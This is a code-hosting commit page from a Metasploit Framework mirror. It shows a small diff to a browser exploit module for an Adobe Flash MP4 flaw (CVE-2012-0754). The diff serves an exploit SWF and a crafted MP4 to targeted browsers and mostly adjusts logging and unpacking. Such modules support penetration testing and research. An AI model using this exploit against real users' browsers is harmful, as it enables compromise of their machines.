infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Small tweaks to the adobe mp4 exploit

unstable
HD Moore 2012-03-07 22:53:36 -06:00
parent 8d93e3ad44
commit b4e0daf3ca
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
View File

@ -65,11 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
end
def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("L")[0].to_i
return make_nops(4).unpack("V").first
end
def get_payload(t)
@ -167,23 +167,23 @@ class Metasploit3 < Msf::Exploit::Remote
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
print_error("#{cli.peerhost}:#{cli.peerport} Browser not supported, will not launch attack: #{agent.to_s}")
send_not_found(cli)
return
end
print_status("Client requesting: #{request.uri}")
print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
mp4 = create_mp4(my_target)
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
return
end
if request.uri =~ /\.swf$/
print_status("Sending Exploit SWF")
print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end
@ -217,7 +217,7 @@ class Metasploit3 < Msf::Exploit::Remote
swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
swf_uri << "/Exploit.swf"
print_status(swf_uri)
print_status("#{cli.peerhost}:#{cli.peerport} #{swf_uri}")
html = %Q|
<html>
@ -266,8 +266,8 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
end
def create_swf
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" )
fd = File.open( path, "rb" )
path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" )
fd = ::File.open( path, "rb" )
swf = fd.read(fd.stat.size)
fd.close